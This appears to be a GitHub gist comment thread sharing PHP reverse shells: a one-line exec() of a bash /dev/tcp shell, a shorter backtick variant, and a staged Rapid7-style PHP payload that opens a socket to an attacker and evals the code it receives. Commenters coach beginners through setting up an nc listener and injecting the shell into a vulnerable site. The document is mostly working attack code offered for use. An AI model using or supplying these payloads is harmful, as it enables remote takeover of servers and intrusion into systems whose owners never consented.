A tiny PHP/bash reverse shell.

shell.php

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

@Serux

Thanks for the comment If I understand you correctly,

Here is my steps what I did,

1. I use ngrok to publicly access my local site on the internet
2. I start the nc in my terminal nc -nvlp 8080
3. from the php script I use my physical ip then 8080
4. I inject that remote url from a vuln site.
5. the nc is now connected to that but the problem is that when I do commands it is on the webserver where I host my remote url

So what I want to achieve is access the vuln site using the reverse shell, I am still a beginner so forgive for that. is that possible?

thank you so much.

@nikkolai14

I had to search what was ngrok.

So ngrok makes a localhost port public, like localhost:3000->publicweb.ngrok.io, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.

So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.

If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080

So the php is being executed in your server, not in another site. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command.

So if that other server (remote url) executes that php( you upload the file and open the url) , you would need a public IP, because that server is on the internet and cannot find your physical ip. In this case you would need a public Ip.

I hope this helps. Ask me if there is something that you dont understand.
I'm writing this on my phone and is a bit difficult to structure the text.

@Serux

Thanks you so much for the reply. I'll try again about the public IP.

This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

it was bash not a php

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

Then this is the tiniest

<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.

eu não sei qual ip usar, alguém me ajuda por gentileza !

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@85406043

1. You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
2. You have to open a listening port in your attacking machine, (nc -nvlp 1234)
3. You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)

And thats all.

@SergioChicoITCL muito obrigado campeão ! você é demais !